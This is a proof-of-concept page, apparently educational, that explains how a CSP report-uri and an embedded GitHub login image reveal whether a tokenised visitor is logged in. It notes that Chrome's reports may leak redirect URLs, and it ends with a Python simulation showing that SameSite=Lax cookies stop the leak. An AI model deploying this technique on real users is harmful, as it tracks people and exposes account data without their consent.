Now, you are on a tokenized page (so the victim is identifiable by the attacker).
This page is served with the following Content-Security-Policy header:
<?php
// Sent with the page; 'self' is the origin the attacker serves this page from.
header("Content-Security-Policy: " .
       "default-src 'self' https://github.com; " .
       "report-uri /mdn/csp/exfiltrate-data-poc/csp-receiver.php");
This means that the browser will allow the current page to load any resource from
https://github.com or from the attacker's origin ('self'),
but the browser will refuse to load anything else (like https://help.github.com).
So, the attacker embeds an image below with the URL
https://github.com/login?return_to=%2Fhelp.
If the user is logged into GitHub, this URL answers with a redirection to
another origin (https://help.github.com), which is not
allowed by the attacker's CSP. So the browser refuses to follow this redirection,
and it sends a report to the URL specified by the report-uri directive.
The body of the request to this URL contains the attacker's page URL (document-uri)
with the victim's unique token, so when the attacker receives such a report, it means
this user is logged into GitHub.
If the user is not logged into GitHub, the https://github.com
page is loaded and the browser tries to show it in the image tag (and fails to, but we don't care).
Since no CSP violation occurred, the browser sends no report, so the attacker knows the user
is not logged into GitHub.
The GitHub image is loaded below. Check your browser console to see the CSP violation report requests.
For this POC, the reports received by the attacker are accessible from here.
Another interesting thing is that browsers send different URIs in the report:
Firefox sends the original image's URI, "blocked-uri":
"https:\/\/github.com\/login?return_to=%2Fhelp",
meaning you're not able to leak much data from GitHub's redirection itself.
But Chrome sends the redirected URI, "blocked-uri": "https:\/\/help.github.com",
meaning that if the targeted website (here, GitHub) exposes sensitive information in the redirection URL
(say, the user's account name or email), then you could access this information too.
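To make the mechanism and the two reporting behaviours above concrete, here is an added Python simulation; it is not code from this PoC page. It models the browser's per-hop CSP check for the image load, the target's login-dependent redirect, and the blocked-uri each browser style would put in the report. The page URL on attacker.example, the token value, the exact redirect target and the simplified source matcher (only 'self' and scheme://host entries) are assumptions. It also adds one case the page does not cover, on the target's side of the problem: a session cookie marked SameSite=Lax is not sent on a cross-site image request, so the login-dependent redirect never happens and no report is produced, whichever URL the browser would have reported.

```python
from urllib.parse import urlsplit

# Constructed values mirroring the PoC: the attacker's page and the report receiver
# share the 'self' origin. attacker.example and the token are placeholders.
PAGE_URL = "https://attacker.example/poc.html?token=victim-123"
POLICY = ("default-src 'self' https://github.com; "
          "report-uri /mdn/csp/exfiltrate-data-poc/csp-receiver.php")
IMG_URL = "https://github.com/login?return_to=%2Fhelp"


def parse_csp(policy):
    """Split a CSP header value into {directive-name: [source expressions]}."""
    directives = {}
    for directive in policy.split(";"):
        parts = directive.split()
        if parts:
            directives[parts[0]] = parts[1:]
    return directives


def origin(url):
    u = urlsplit(url)
    return f"{u.scheme}://{u.netloc}"


def source_allowed(sources, url, page_origin):
    """Minimal matcher: handles 'self' and scheme://host entries only
    (assumption: no wildcards, paths or nonces, which this policy does not use)."""
    for src in sources:
        if src == "'self'":
            if origin(url) == page_origin:
                return True
        elif origin(url) == origin(src):
            return True
    return False


def browser_load(policy, page_url, img_url, redirect_chain, report_post_redirect):
    """Simulate the CSP check an <img> load goes through, hop by hop.

    redirect_chain: Location targets the server answers with, in order (may be empty).
    report_post_redirect: True for the Chrome behaviour the page describes (blocked-uri
      is the redirect target's origin), False for the Firefox one (original image URL).
    Returns None when the load is allowed, otherwise the csp-report body the browser
    would POST to report-uri.
    """
    directives = parse_csp(policy)
    sources = directives.get("img-src", directives.get("default-src", []))
    page_origin = origin(page_url)
    for hop in [img_url] + redirect_chain:
        if not source_allowed(sources, hop, page_origin):
            blocked = origin(hop) if report_post_redirect else img_url
            return {"csp-report": {
                "document-uri": page_url,          # carries the victim's token
                "blocked-uri": blocked,
                "violated-directive": "default-src",
                "original-policy": policy,
            }}
    return None


def github_response(cookie_present):
    """Model of the target's behaviour described on the page: a request carrying a
    session cookie is redirected cross-origin, an anonymous one gets a page back.
    The redirect target path is a constructed assumption."""
    return ["https://help.github.com/"] if cookie_present else []


def cookie_sent_on_cross_site_image(samesite):
    """A session cookie travels on a cross-site <img> request only when it is
    SameSite=None; Lax and Strict cookies are withheld on cross-site subresources."""
    return samesite == "None"


def scenario(logged_in, samesite, report_post_redirect):
    """What report, if any, reaches the attacker's receiver for one victim."""
    cookie = logged_in and cookie_sent_on_cross_site_image(samesite)
    return browser_load(POLICY, PAGE_URL, IMG_URL, github_response(cookie),
                        report_post_redirect)


if __name__ == "__main__":
    for logged_in, samesite, chrome_style in [(True, "None", False),
                                              (True, "None", True),
                                              (False, "None", True),
                                              (True, "Lax", True)]:
        r = scenario(logged_in, samesite, chrome_style)
        blocked = r["csp-report"]["blocked-uri"] if r else "(no report)"
        print(f"logged_in={logged_in} SameSite={samesite} "
              f"post-redirect-uri={chrome_style}: {blocked}")
```

The first two scenarios reproduce the report contents quoted above for Firefox and Chrome; the third shows the silent case for an anonymous user; the fourth shows that with a SameSite=Lax session cookie the oracle returns nothing regardless of login state, because the redirect that creates the violation never occurs.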